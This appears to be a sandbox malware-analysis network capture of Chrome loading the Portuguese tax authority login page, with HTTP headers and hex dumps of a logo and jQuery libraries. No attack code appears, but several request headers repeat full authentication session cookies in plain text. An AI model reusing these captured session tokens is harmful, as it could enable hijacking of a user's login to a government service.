                                                                                                                  2024-11-14 13:59:55 UTC16384INData Raw: 2c 0c 82 31 10 00 34 4c dd 53 1e 95 24 b2 45 79 ee 1b cc 87 b4 6b 43 9c e8 89 4e 4b 77 08 6f a3 44 4b c4 04 22 08 57 50 bc c6 87 ae b7 d9 e6 73 b4 aa a4 4d 44 96 16 16 a7 af 74 ed a7 ae bd 52 82 25 8a 40 f1 41 94 5d 78 d0 b5 5f f0 a6 ec 48 f9 3d b1 d0 94 e8 59 c4 33 a1 83 8b b0 b8 f0 27 96 58 c6 aa 7b 06 6e 69 e1 e6 3d 8a 42 f5 12 d7 66 aa bb 44 d1 ac f1 61 8a d5 12 d7 1e e5 4f ec d5 7b b3 15 4a ce a7 91 71 14 ae 3b 74 9a 45 c4 40 b0 9a 8b 1e 1b af 49 d2 c0 45 ab 8e d6 d5 47 cc ef 23 10 f9 06 a5 df 91 a5 7a ad 6b 2b 5d 7b c4 b5 a5 e6 cb 88 6f 9b 36 75 ca 3f dd 1a 1b 36 6e 5a ca 1b 33 cd a2 85 09 db 09 12 2d 11 03 db 4b 88 16 ee 15 ad 69 f5 53 b4 50 57 e8 1c f3 c5 1b 9f 6b be 14 b9 c8 17 70 61 1c e0 cd b5 8a 02 b5 d8 b5 c7 cc 27 fc dc cd 9b 0e b5 81 3a 9d
                                                                                                                  Data Ascii: ,14LS$EykCNKwoDK"WPsMDtR%@A]x_H=Y3'X{ni=BfDaO{Jq;tE@IEG#zk+]{o6u?6nZ3-KiSPWkpa':
                                                                                                                  2024-11-14 13:59:55 UTC389INData Raw: f9 a9 8e 78 cc 0a cd 7d b7 e7 8c 13 f0 85 d1 38 59 d3 d1 30 b0 b9 5e 5b d0 03 14 9f d1 41 6e 3d 1d e2 03 0f 07 72 ee de 29 cc e3 8d d1 b8 34 87 d6 2a 64 f5 11 3f b9 0b f9 02 39 bf c4 21 71 49 cf 4e 93 b4 00 3d 6a 86 5a 68 f7 20 74 6f 53 f8 aa 05 c5 a0 d0 38 d0 26 83 2e c4 cb 0b 72 3f db b8 35 be b7 6f c6 88 9e 68 5b 33 d0 d2 ad a1 37 c7 42 41 dc 45 39 9b 2f 42 15 e4 e3 29 0d 27 bf 87 79 8a 38 bf 2e b2 b6 ae 8e ac ad 97 d3 24 2d 08 2b 16 63 ac d6 dc 6f 14 47 46 e3 04 53 95 fc 46 6f b4 a8 e3 ee cb 31 41 0d 75 4b 8a 4a ff c4 3a 51 54 6d 97 c1 b5 90 26 70 6f 0e 2d d1 8f fa a6 27 e4 17 d4 b3 3d cc 82 90 6a 71 9a a4 15 97 fd 1f ef 9b 87 b0 61 82 ff 9c d5 5e f7 4d e8 1a 2b 2d 08 2f fe 99 93 eb 6d f3 d1 cf d7 c3 be 4e 52 07 bb 25 95 65 69 b4 2b dc 5a cd 1b 20 fa
                                                                                                                  Data Ascii: x}8Y0^[An=r)4*d?9!qIN=jZh toS8&.r?5oh[37BAE9/B)'y8.$-+coGFSFo1AuKJ:QTm&po-'=jqa^M+-/mNR%ei+Z
                                                                                                                  2024-11-14 13:59:55 UTC10689INData Raw: 2f b5 20 f3 fc e6 68 bc 55 1f 87 c2 80 c3 c7 9b 9c 4b e6 a7 49 5a e0 8d 6e a2 7f 2f 67 0b 3f 6d 6c eb 73 f2 1e 4d 45 c3 80 24 fb 0a 3f 08 2c 69 81 8d 13 17 f9 e6 7e 38 89 a5 e8 87 fa bf c3 5a dc b2 46 5e 4c 02 31 6a c1 bc 75 73 ee e7 07 41 a9 05 8b 03 3c 0e 74 21 38 24 b2 b6 ae 8d ac ad 57 d2 24 2d 54 4d 1f 8a c6 f5 d1 98 ac b9 5f 07 82 e9 17 46 e3 34 93 bf bd 91 c0 8d 85 c2 ad d9 55 c7 7b f9 e0 59 d2 fd 77 80 05 d9 f9 70 b7 a8 18 7b ba 95 b5 b5 e5 c3 0d cc 67 f5 bb 16 1a 3c e6 0d 07 fa 9c 0b c5 c2 2e 4e 5c ff ea ea 50 da 28 d2 22 5f 64 2f df a4 3f 6f aa 92 41 93 cc af 45 e3 6d a6 18 56 23 41 c5 f6 0b ac f9 4a 55 92 7a f1 b7 53 24 9a b2 5b 63 dd aa e2 b5 bc 96 0c 5a ee e4 ff 50 0e af 9d 43 c3 71 3e ff 42 f1 f0 7a ff ac fd 3b 4d d2 8a 4f a2 6f b1 50 fa 85
                                                                                                                  Data Ascii: / hUKIZn/g?mlsME$?,i~8ZF^L1jusA<t!8$W$-TM_F4U{Ywp{g<.N\P("_d/?oAEmV#AJUzS$[cZPCq>Bz;MOoP


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.44975462.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:55 UTC1178OUTGET /autentica_static/img/logo-at.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC372INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=79
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 300
                                                                                                                  Content-Length: 8698
                                                                                                                  2024-11-14 13:59:55 UTC8698INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 d4 00 00 00 41 08 06 00 00 00 a9 75 8a e8 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0d d7 00 00 0d d7 01 42 28 9b 78 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ed 9d 77 7c 54 65 d6 c7 bf e7 ce 4c 0a a1 85 0e 99 09 4d e9 2a 0a 58 50 c1 48 26 a1 28 ba 8a e8 5a b0 8b 15 7b 43 77 d5 5d 5c eb aa 88 ba bb 76 d4 45 c1 b2 b6 05 52 10 04 22 52 2c 08 22 bd 64 26 48 51 42 4f 9b b9 e7 fd e3 de 99 64 92 49 28 01 cb bb f7 f7 f9 4c 72 ef 7d ce d3 ee bd e7 3e e7 39 cf 39 e7 11 55 c5 81 03 07 87 06 c6 af dd 00 07 0e fe 3f c1 61 28 07 0e 0e 21 1c 86 72 e0 e0 10 c2 7d a0 19 fa 0c bd 6e
                                                                                                                  Data Ascii: PNGIHDRAusBIT|dpHYsB(xtEXtSoftwarewww.inkscape.org< IDATxw|TeLM*XPH&(Z{Cw]\vER"R,"d&HQBOdI(Lr}>99U?a(!r}n


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  16192.168.2.44975362.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:55 UTC1143OUTGET /autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC370INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 95790
                                                                                                                  2024-11-14 13:59:55 UTC16014INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 31 31 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 34 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69
                                                                                                                  Data Ascii: /*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a wi
                                                                                                                  2024-11-14 13:59:55 UTC16384INData Raw: 61 2e 72 65 70 6c 61 63 65 28 52 2c 22 24 31 22 29 29 3b 72 65 74 75 72 6e 20 64 5b 75 5d 3f 68 62 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 65 29 7b 76 61 72 20 66 2c 67 3d 64 28 61 2c 6e 75 6c 6c 2c 65 2c 5b 5d 29 2c 68 3d 61 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 68 2d 2d 29 28 66 3d 67 5b 68 5d 29 26 26 28 61 5b 68 5d 3d 21 28 62 5b 68 5d 3d 66 29 29 7d 29 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 62 5b 30 5d 3d 61 2c 64 28 62 2c 6e 75 6c 6c 2c 66 2c 63 29 2c 21 63 2e 70 6f 70 28 29 7d 7d 29 2c 68 61 73 3a 68 62 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 66 62 28 61 2c 62 29 2e 6c 65 6e 67 74 68 3e 30 7d 7d 29 2c 63 6f 6e 74 61 69 6e 73 3a
                                                                                                                  Data Ascii: a.replace(R,"$1"));return d[u]?hb(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),!c.pop()}}),has:hb(function(a){return function(b){return fb(a,b).length>0}}),contains:
                                                                                                                  2024-11-14 13:59:55 UTC370INData Raw: 5d 2e 64 61 74 61 2c 62 29 29 2c 67 3d 6a 5b 6b 5d 2c 65 7c 7c 28 67 2e 64 61 74 61 7c 7c 28 67 2e 64 61 74 61 3d 7b 7d 29 2c 67 3d 67 2e 64 61 74 61 29 2c 76 6f 69 64 20 30 21 3d 3d 64 26 26 28 67 5b 6d 2e 63 61 6d 65 6c 43 61 73 65 28 62 29 5d 3d 64 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 3f 28 66 3d 67 5b 62 5d 2c 6e 75 6c 6c 3d 3d 66 26 26 28 66 3d 67 5b 6d 2e 63 61 6d 65 6c 43 61 73 65 28 62 29 5d 29 29 3a 66 3d 67 2c 66 7d 7d 66 75 6e 63 74 69 6f 6e 20 52 28 61 2c 62 2c 63 29 7b 69 66 28 6d 2e 61 63 63 65 70 74 44 61 74 61 28 61 29 29 7b 76 61 72 20 64 2c 65 2c 66 3d 61 2e 6e 6f 64 65 54 79 70 65 2c 67 3d 66 3f 6d 2e 63 61 63 68 65 3a 61 2c 68 3d 66 3f 61 5b 6d 2e 65 78 70 61 6e 64 6f 5d 3a 6d 2e 65 78 70 61 6e 64 6f 3b 69 66 28
                                                                                                                  Data Ascii: ].data,b)),g=j[k],e||(g.data||(g.data={}),g=g.data),void 0!==d&&(g[m.camelCase(b)]=d),"string"==typeof b?(f=g[b],null==f&&(f=g[m.camelCase(b)])):f=g,f}}function R(a,b,c){if(m.acceptData(a)){var d,e,f=a.nodeType,g=f?m.cache:a,h=f?a[m.expando]:m.expando;if(
                                                                                                                  2024-11-14 13:59:55 UTC16384INData Raw: 69 6e 20 64 3f 5b 62 5d 3a 62 2e 73 70 6c 69 74 28 22 20 22 29 29 2c 65 3d 62 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 65 2d 2d 29 64 65 6c 65 74 65 20 64 5b 62 5b 65 5d 5d 3b 69 66 28 63 3f 21 50 28 64 29 3a 21 6d 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 64 29 29 72 65 74 75 72 6e 7d 28 63 7c 7c 28 64 65 6c 65 74 65 20 67 5b 68 5d 2e 64 61 74 61 2c 50 28 67 5b 68 5d 29 29 29 26 26 28 66 3f 6d 2e 63 6c 65 61 6e 44 61 74 61 28 5b 61 5d 2c 21 30 29 3a 6b 2e 64 65 6c 65 74 65 45 78 70 61 6e 64 6f 7c 7c 67 21 3d 67 2e 77 69 6e 64 6f 77 3f 64 65 6c 65 74 65 20 67 5b 68 5d 3a 67 5b 68 5d 3d 6e 75 6c 6c 29 7d 7d 7d 6d 2e 65 78 74 65 6e 64 28 7b 63 61 63 68 65 3a 7b 7d 2c 6e 6f 44 61 74 61 3a 7b 22 61 70 70 6c 65 74 20 22 3a 21 30 2c 22 65 6d 62 65 64 20 22
                                                                                                                  Data Ascii: in d?[b]:b.split(" ")),e=b.length;while(e--)delete d[b[e]];if(c?!P(d):!m.isEmptyObject(d))return}(c||(delete g[h].data,P(g[h])))&&(f?m.cleanData([a],!0):k.deleteExpando||g!=g.window?delete g[h]:g[h]=null)}}}m.extend({cache:{},noData:{"applet ":!0,"embed "
                                                                                                                  2024-11-14 13:59:55 UTC16384INData Raw: 76 6f 69 64 20 30 3d 3d 3d 62 7c 7c 62 26 26 6d 2e 6e 6f 64 65 4e 61 6d 65 28 61 2c 62 29 3f 6d 2e 6d 65 72 67 65 28 5b 61 5d 2c 66 29 3a 66 7d 66 75 6e 63 74 69 6f 6e 20 76 62 28 61 29 7b 57 2e 74 65 73 74 28 61 2e 74 79 70 65 29 26 26 28 61 2e 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 3d 61 2e 63 68 65 63 6b 65 64 29 7d 66 75 6e 63 74 69 6f 6e 20 77 62 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6d 2e 6e 6f 64 65 4e 61 6d 65 28 61 2c 22 74 61 62 6c 65 22 29 26 26 6d 2e 6e 6f 64 65 4e 61 6d 65 28 31 31 21 3d 3d 62 2e 6e 6f 64 65 54 79 70 65 3f 62 3a 62 2e 66 69 72 73 74 43 68 69 6c 64 2c 22 74 72 22 29 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 74 62 6f 64 79 22 29 5b 30 5d 7c 7c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 2e
                                                                                                                  Data Ascii: void 0===b||b&&m.nodeName(a,b)?m.merge([a],f):f}function vb(a){W.test(a.type)&&(a.defaultChecked=a.checked)}function wb(a,b){return m.nodeName(a,"table")&&m.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.
                                                                                                                  2024-11-14 13:59:55 UTC16384INData Raw: 26 65 5b 33 5d 7c 7c 28 6d 2e 63 73 73 4e 75 6d 62 65 72 5b 61 5d 3f 22 22 3a 22 70 78 22 29 2c 67 3d 28 6d 2e 63 73 73 4e 75 6d 62 65 72 5b 61 5d 7c 7c 22 70 78 22 21 3d 3d 66 26 26 2b 64 29 26 26 62 63 2e 65 78 65 63 28 6d 2e 63 73 73 28 63 2e 65 6c 65 6d 2c 61 29 29 2c 68 3d 31 2c 69 3d 32 30 3b 69 66 28 67 26 26 67 5b 33 5d 21 3d 3d 66 29 7b 66 3d 66 7c 7c 67 5b 33 5d 2c 65 3d 65 7c 7c 5b 5d 2c 67 3d 2b 64 7c 7c 31 3b 64 6f 20 68 3d 68 7c 7c 22 2e 35 22 2c 67 2f 3d 68 2c 6d 2e 73 74 79 6c 65 28 63 2e 65 6c 65 6d 2c 61 2c 67 2b 66 29 3b 77 68 69 6c 65 28 68 21 3d 3d 28 68 3d 63 2e 63 75 72 28 29 2f 64 29 26 26 31 21 3d 3d 68 26 26 2d 2d 69 29 7d 72 65 74 75 72 6e 20 65 26 26 28 67 3d 63 2e 73 74 61 72 74 3d 2b 67 7c 7c 2b 64 7c 7c 30 2c 63 2e 75 6e 69
                                                                                                                  Data Ascii: &e[3]||(m.cssNumber[a]?"":"px"),g=(m.cssNumber[a]||"px"!==f&&+d)&&bc.exec(m.css(c.elem,a)),h=1,i=20;if(g&&g[3]!==f){f=f||g[3],e=e||[],g=+d||1;do h=h||".5",g/=h,m.style(c.elem,a,g+f);while(h!==(h=c.cur()/d)&&1!==h&&--i)}return e&&(g=c.start=+g||+d||0,c.uni
                                                                                                                  2024-11-14 13:59:55 UTC13870INData Raw: 6f 72 28 67 20 69 6e 20 61 2e 63 6f 6e 76 65 72 74 65 72 73 29 6a 5b 67 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 3d 61 2e 63 6f 6e 76 65 72 74 65 72 73 5b 67 5d 3b 66 3d 6b 2e 73 68 69 66 74 28 29 3b 77 68 69 6c 65 28 66 29 69 66 28 61 2e 72 65 73 70 6f 6e 73 65 46 69 65 6c 64 73 5b 66 5d 26 26 28 63 5b 61 2e 72 65 73 70 6f 6e 73 65 46 69 65 6c 64 73 5b 66 5d 5d 3d 62 29 2c 21 69 26 26 64 26 26 61 2e 64 61 74 61 46 69 6c 74 65 72 26 26 28 62 3d 61 2e 64 61 74 61 46 69 6c 74 65 72 28 62 2c 61 2e 64 61 74 61 54 79 70 65 29 29 2c 69 3d 66 2c 66 3d 6b 2e 73 68 69 66 74 28 29 29 69 66 28 22 2a 22 3d 3d 3d 66 29 66 3d 69 3b 65 6c 73 65 20 69 66 28 22 2a 22 21 3d 3d 69 26 26 69 21 3d 3d 66 29 7b 69 66 28 67 3d 6a 5b 69 2b 22 20 22 2b 66 5d 7c 7c 6a 5b 22 2a
                                                                                                                  Data Ascii: or(g in a.converters)j[g.toLowerCase()]=a.converters[g];f=k.shift();while(f)if(a.responseFields[f]&&(c[a.responseFields[f]]=b),!i&&d&&a.dataFilter&&(b=a.dataFilter(b,a.dataType)),i=f,f=k.shift())if("*"===f)f=i;else if("*"!==i&&i!==f){if(g=j[i+" "+f]||j["*


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  17192.168.2.44975562.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:55 UTC1145OUTGET /autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC401INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=14
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 21587
                                                                                                                  2024-11-14 13:59:55 UTC15983INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 56 61 6c 69 64 61 74 69 6f 6e 20 50 6c 75 67 69 6e 20 2d 20 76 31 2e 31 33 2e 31 20 2d 20 31 30 2f 31 34 2f 32 30 31 34 0d 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 76 61 6c 69 64 61 74 69 6f 6e 2e 6f 72 67 2f 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 34 20 4a c3 b6 72 6e 20 5a 61 65 66 66 65 72 65 72 3b 20 4c 69 63 65 6e 73 65 64 20 4d 49 54 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 61 29 3a 61 28 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 65 78 74 65 6e 64 28 61 2e 66 6e 2c 7b 76 61 6c
                                                                                                                  Data Ascii: /*! jQuery Validation Plugin - v1.13.1 - 10/14/2014 * http://jqueryvalidation.org/ * Copyright (c) 2014 Jrn Zaefferer; Licensed MIT */!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a(jQuery)}(function(a){a.extend(a.fn,{val
                                                                                                                  2024-11-14 13:59:55 UTC5604INData Raw: 65 74 75 72 6e 20 61 2e 65 61 63 68 28 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 69 66 28 65 3d 3d 3d 21 31 29 72 65 74 75 72 6e 20 76 6f 69 64 20 64 65 6c 65 74 65 20 62 5b 64 5d 3b 69 66 28 65 2e 70 61 72 61 6d 7c 7c 65 2e 64 65 70 65 6e 64 73 29 7b 76 61 72 20 66 3d 21 30 3b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 65 2e 64 65 70 65 6e 64 73 29 7b 63 61 73 65 22 73 74 72 69 6e 67 22 3a 66 3d 21 21 61 28 65 2e 64 65 70 65 6e 64 73 2c 63 2e 66 6f 72 6d 29 2e 6c 65 6e 67 74 68 3b 62 72 65 61 6b 3b 63 61 73 65 22 66 75 6e 63 74 69 6f 6e 22 3a 66 3d 65 2e 64 65 70 65 6e 64 73 2e 63 61 6c 6c 28 63 2c 63 29 7d 66 3f 62 5b 64 5d 3d 76 6f 69 64 20 30 21 3d 3d 65 2e 70 61 72 61 6d 3f 65 2e 70 61 72 61 6d 3a 21 30 3a 64 65 6c 65 74 65 20 62 5b 64 5d 7d 7d
                                                                                                                  Data Ascii: eturn a.each(b,function(d,e){if(e===!1)return void delete b[d];if(e.param||e.depends){var f=!0;switch(typeof e.depends){case"string":f=!!a(e.depends,c.form).length;break;case"function":f=e.depends.call(c,c)}f?b[d]=void 0!==e.param?e.param:!0:delete b[d]}}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  18192.168.2.44975762.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:55 UTC1144OUTGET /autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
